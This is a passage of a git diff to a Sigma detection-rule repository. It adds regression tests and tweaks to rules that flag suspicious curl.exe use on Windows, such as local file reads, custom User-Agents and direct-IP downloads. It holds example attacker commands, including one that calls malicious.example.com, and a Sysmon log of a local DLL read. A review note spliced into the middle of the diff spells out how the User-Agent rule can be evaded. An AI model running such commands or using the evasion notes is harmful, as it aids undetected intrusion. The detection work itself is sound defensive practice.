+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77
+ title: Insecure Proxy/DOH Transfer Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx
new file mode 100755
index 000000000..c1390aafd
Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx differ
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json
new file mode 100644
index 000000000..96eb7c085
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:51:23.281436Z"
+ }
+ },
+ "EventRecordID": 21706,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:51:23.255",
+ "ProcessGuid": "0197231E-69EB-693A-1313-000000000800",
+ "ProcessId": 13896,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl file:///C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml
new file mode 100644
index 000000000..a68d78d05
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml
@@ -0,0 +1,13 @@
+id: 4dfcc9a3-f555-4692-aa17-bca049de2f61
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: aa6f6ea6-0676-40dd-b510-6e46f02d8867
+ title: Local File Read Using Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx
diff --git a/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml b/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml
index 796cb8382..9278e854e 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml
@@ -22,3 +22,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml b/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml
index c47022bc2..b48dbea1b 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml
@@ -7,19 +7,26 @@ references:
 - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
 author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023-07-27
+modified: 2025-12-11
 tags:
 - attack.execution
 logsource:
 category: process_creation
 product: windows
 detection:
+ # Example: This command line would trigger the rule
+ # curl.exe -H "User-Agent: EvilAgent" http://malicious.example.com
 selection_img:
 - Image|endswith: '\curl.exe'
 - OriginalFileName: 'curl.exe'
- selection_header:
+ selection_header_flag_1:
 CommandLine|re: '\s-H\s' # Must be Regex as the flag needs to be case sensitive
+ selection_header_flag_2:
+ CommandLine|contains: '--header'
+ selection_user_agent:
 CommandLine|contains: 'User-Agent:'
- condition: all of selection_*
+ condition: selection_img and 1 of selection_header_* and selection_user_agent
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml
index d4174b490..00d4e7de0 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml
@@ -78,3 +78,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml
index 7a9688040..0df03ff35 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml
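Review bot: The retained anchor `CommandLine|re: '\s-H\s'` in `selection_header_flag_1` requires whitespace after `-H`, so the glued short-option form curl accepts, `curl.exe -H"User-Agent: EvilAgent" http://...`, is not matched by either header selection and trivially evades the rule while the intended example still fires. Widening the regex to `CommandLine|re: '\s-H(\s|")'` keeps the case-sensitive `-H` check and covers that form; `-H@file`/`--header @file` (headers read from a file) and `-A`/`--user-agent`, which set the same header, remain uncovered and are worth stating as known limitations in the rule if that is deliberate. The `--header` `contains` match is case-insensitive, which is harmless since curl itself only accepts the lowercase long option.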
+++ b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml
@@ -75,3 +75,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml b/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml
index a404e39aa..261dbcad7 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml
@@ -94,3 +94,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml b/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml
index 8c3360a74..18e416a32 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml
@@ -22,3 +22,4 @@ detection:
 falsepositives:
 - Access to badly maintained internal or development systems
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml b/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml
similarity index 85%
rename from rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml
rename to rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml
index eac8b3bf2..d6e5bfa58 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml
@@ -23,3 +23,4 @@ detection:
 falsepositives:
 - Access to badly maintained internal or development systems
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml b/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml
index 257c0f0f7..1e6a27821 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml
@@ -21,3 +21,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml